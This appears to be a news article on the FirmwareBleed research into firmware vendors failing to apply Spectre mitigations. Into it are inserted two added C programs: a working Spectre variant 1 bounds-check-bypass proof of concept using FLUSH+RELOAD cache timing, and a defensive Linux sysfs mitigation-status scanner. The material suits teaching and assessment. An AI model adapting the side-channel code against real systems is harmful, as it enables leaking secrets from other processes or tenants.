New Study Finds Most Enterprise Vendors Failing to Mitigate Speculative Execution Attacks
With speculative execution attacks remaining a stubbornly persistent vulnerability ailing modern processors, new research has highlighted an "industry failure" to adopt mitigations released by AMD and Intel, posing a firmware supply chain threat.
Dubbed FirmwareBleed by Binarly, the information-leaking attacks stem from enterprise vendors continuing to expose microarchitectural attack surfaces, either by not incorporating the fixes correctly or by applying them only partially.
"The impact of such attacks is focused on disclosing the content from privileged memory (including protected by virtualization technologies) to obtain sensitive data from processes running on the same processor (CPU)," the firmware protection firm said in a report shared with The Hacker News.
"Cloud environments can have a greater impact when a physical server can be shared by multiple users or legal entities."
In recent years, implementations of speculative execution, a performance optimization in which the processor predicts the outcome and target of branch instructions and executes the predicted path before the branch is actually resolved, have been shown to be susceptible to Spectre-like attacks across processor architectures, potentially enabling a threat actor to leak cryptographic keys and other secrets.
This works by tricking the CPU into speculatively executing an instruction that accesses sensitive memory an unprivileged application would normally be unable to read. When the misprediction is detected, the CPU discards the architectural results of that instruction, but the speculative access leaves microarchitectural traces, such as which cache lines were loaded, and the attacker recovers the data by measuring those side effects, typically through cache timing.
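The mechanism described above, as an added example that is not code from the article, Binarly, or either CPU vendor: a minimal Spectre variant 1 (bounds-check bypass) program in the style of the original Kocher et al. proof of concept. The victim gadget performs a bounds check that is correct architecturally; the attacker trains the branch predictor, evicts the bound from the cache so the check resolves late, and then uses a FLUSH+RELOAD cache-timing channel to learn which line the speculative load touched. The "secret" string is constructed for the demo and sits in the same address space, the cache-hit threshold is an assumed value to tune per machine, and the timing channel is implemented only for x86 (elsewhere the gadget compiles but no leak is attempted). Whether the leak actually succeeds depends on the CPU, compiler and the mitigations in force, which is exactly the point of the page.

```c
/* Added example (not from the article, Binarly, or Intel/AMD): a minimal Spectre
 * variant 1 (bounds-check bypass) demonstration in the style of the original
 * Kocher et al. proof of concept. The "secret" is a constructed string and the
 * cache-hit threshold is an assumption to tune per machine. The FLUSH+RELOAD
 * channel is implemented for x86 only; elsewhere the gadget compiles but
 * leak_byte() reports that no channel is available. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#define HAVE_CACHE_CHANNEL 1
static void cache_flush(const void *p) { _mm_clflush(p); }
static uint64_t timed_read(const volatile uint8_t *p) {
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                               /* the load whose latency we measure */
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}
#else
#define HAVE_CACHE_CHANNEL 0
static void cache_flush(const void *p) { (void)p; }
static uint64_t timed_read(const volatile uint8_t *p) { (void)*p; return 0; }
#endif

#define ARRAY1_SIZE 16
#define LINE 512                 /* one cache line (plus padding) per byte value */
#define CACHE_HIT_THRESHOLD 80   /* cycles; assumed, tune for the machine */

static uint8_t array1[ARRAY1_SIZE] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
static uint8_t array2[256 * LINE];                     /* probe array for the channel */
static volatile unsigned array1_size = ARRAY1_SIZE;    /* in memory so it can be flushed */
static const char *secret = "FirmwareBleed example secret";   /* constructed target */
static volatile uint8_t temp;                          /* keeps the load from being dropped */

/* The vulnerable gadget: an out-of-bounds x never passes the check architecturally,
 * but while array1_size is being fetched the CPU may speculatively run the body,
 * pulling array2[array1[x] * LINE] into the cache. Returns array1[x] if in bounds. */
uint8_t victim_function(size_t x) {
    if (x < array1_size) {
        temp &= array2[array1[x] * LINE];
        return array1[x];
    }
    return 0;
}

/* RELOAD decision: the byte value whose probe line was a cache hit is the leaked
 * value. Returns that value, or -1 if no line was clearly a hit. */
int best_guess(const uint64_t latency[256]) {
    int best = -1;
    uint64_t best_t = UINT64_MAX;
    for (int v = 0; v < 256; v++)
        if (latency[v] < CACHE_HIT_THRESHOLD && latency[v] < best_t) { best_t = latency[v]; best = v; }
    return best;
}

/* Try to leak the byte at array1[malicious_x] (any address reachable from array1).
 * Returns the guess, or -1 if no channel is available or no signal was observed. */
int leak_byte(size_t malicious_x) {
    if (!HAVE_CACHE_CHANNEL) return -1;
    uint64_t latency[256];
    size_t training_x = malicious_x % ARRAY1_SIZE;      /* any in-bounds index */
    for (int v = 0; v < 256; v++) cache_flush(&array2[v * LINE]);   /* FLUSH */
    /* Five in-bounds calls train the predictor, then one out-of-bounds call runs
     * with array1_size evicted so the bounds check resolves late. The index is
     * selected branch-free so the selection itself does not perturb the predictor. */
    for (int i = 29; i >= 0; i--) {
        cache_flush((const void *)&array1_size);
        for (volatile int z = 0; z < 100; z++) { }     /* let the flush complete */
        size_t x = (size_t)(((i % 6) - 1) & ~0xFFFF);  /* all ones when i%6==0, else 0 */
        x = x | (x >> 16);
        x = training_x ^ (x & (malicious_x ^ training_x));
        victim_function(x);
    }
    for (int v = 0; v < 256; v++) {                     /* RELOAD, in scrambled order */
        int mix = ((v * 167) + 13) & 255;               /* defeats the stride prefetcher */
        latency[mix] = timed_read(&array2[mix * LINE]);
    }
    return best_guess(latency);
}

int main(void) {
    size_t off = (size_t)((const char *)secret - (const char *)array1);
    size_t len = strlen(secret);
    for (size_t i = 0; i < len; i++) {
        int g = leak_byte(off + i);
        if (g < 0) printf("byte %2zu: (no signal)\n", i);
        else printf("byte %2zu: 0x%02x '%c'\n", i, g, (g > 31 && g < 127) ? g : '?');
    }
    return 0;
}
```

The architectural contract of `victim_function` is never violated: any out-of-bounds index returns 0. Everything the attacker learns comes from the cache state left behind by the discarded speculative path, which is why fixing the bug requires stopping or fencing the speculation (or isolating the channel) rather than adding more checks to the source.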
A key countermeasure against one class of these attacks is a software defense known as retpoline (short for "return trampoline"), introduced by Google in January 2018. It replaces vulnerable indirect branches with a construct built around a return instruction, so that if the CPU speculates it is steered into a harmless loop rather than an attacker-chosen target; it specifically addresses Spectre variant 2 (branch target injection).
Although recent findings such as Retbleed have shown that retpoline alone is insufficient to stop such attacks in certain scenarios (on some older Intel and AMD processors, return instructions themselves can be made to speculate to attacker-controlled targets, undermining the assumption retpoline relies on), the latest analysis shows a lack of consistency in applying even these mitigations in the first place.
"Our FirmwareBleed research shows that industry adoption can be quite low and mitigations do not always apply even if they are technically available," Alex Matrosov, CEO and co-founder of Binarly, told The Hacker News.
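A practitioner reading this will want to know what their own systems report. The following is an added example, not code from the article or Binarly, that reads the per-vulnerability status files the Linux kernel exposes under /sys/devices/system/cpu/vulnerabilities/ and flags every entry still marked "Vulnerable". The sample status lines used in the comments and tests are constructed to match the kernel's format. An important caveat: this reports the state of the running kernel and the loaded microcode only. It cannot tell you whether the UEFI firmware itself (SMM handlers, runtime services) was built with retpoline or uses IBRS, which is what Binarly's analysis examines; the closest OS-visible hint is the "IBRS_FW" token, which means the kernel does not trust the firmware and raises IBRS around calls into it.

```c
/* Added example (not from the article or Binarly): read what the Linux kernel
 * reports about speculative-execution mitigations and flag entries still
 * marked "Vulnerable". Reports the OS/microcode state only; it cannot see
 * whether the UEFI firmware itself applies retpoline or IBRS. */
#include <dirent.h>
#include <stdio.h>
#include <string.h>

enum status { STATUS_UNKNOWN, STATUS_NOT_AFFECTED, STATUS_MITIGATED, STATUS_VULNERABLE };

/* Classify one sysfs status line by its leading keyword, e.g.
 *   "Not affected"
 *   "Mitigation: Retpolines, IBPB: conditional, IBRS_FW, STIBP: conditional, RSB filling"
 *   "Vulnerable: Retpoline without IBPB"            (constructed samples) */
enum status classify_status(const char *line) {
    if (strncmp(line, "Not affected", 12) == 0) return STATUS_NOT_AFFECTED;
    if (strncmp(line, "Mitigation:", 11) == 0)  return STATUS_MITIGATED;
    if (strncmp(line, "Vulnerable", 10) == 0)   return STATUS_VULNERABLE;
    return STATUS_UNKNOWN;
}

/* "IBRS_FW" in the spectre_v2 line means the kernel raises IBRS around calls
 * into firmware because it does not assume the firmware is mitigated. */
int protects_firmware_calls(const char *line) {
    return strstr(line, "IBRS_FW") != NULL;
}

/* Read every file in dir, print name and status to out (may be NULL), and
 * return the number of entries reported Vulnerable, or -1 if dir cannot be opened. */
int scan_vulnerabilities(const char *dir, FILE *out) {
    DIR *d = opendir(dir);
    if (!d) return -1;
    int vulnerable = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (e->d_name[0] == '.') continue;
        char path[1024], line[256];
        int n = snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        if (n < 0 || (size_t)n >= sizeof path) continue;   /* path too long, skip */
        FILE *f = fopen(path, "r");
        if (!f) continue;
        if (!fgets(line, sizeof line, f)) line[0] = '\0';
        fclose(f);
        line[strcspn(line, "\n")] = '\0';
        enum status s = classify_status(line);
        if (s == STATUS_VULNERABLE) vulnerable++;
        if (out)
            fprintf(out, "%-28s %s%s\n", e->d_name, line,
                    protects_firmware_calls(line) ? "  [kernel guards firmware calls]" : "");
    }
    closedir(d);
    return vulnerable;
}

/* Usage: ./spec_status [dir]; exit status 1 if anything is still Vulnerable. */
int main(int argc, char **argv) {
    const char *dir = argc > 1 ? argv[1] : "/sys/devices/system/cpu/vulnerabilities";
    int n = scan_vulnerabilities(dir, stdout);
    if (n < 0) { perror(dir); return 2; }
    printf("%d entr%s still reported Vulnerable\n", n, n == 1 ? "y" : "ies");
    return n > 0;
}
```

Run it without arguments on the host being assessed; pass a directory path to run it against a copied or constructed set of status files. A "Mitigation:" result for spectre_v2 that lacks IBRS_FW on hardware where the firmware has not been rebuilt with the vendor fixes is exactly the gap the FirmwareBleed research describes, and only firmware-level analysis of the image itself can close the question.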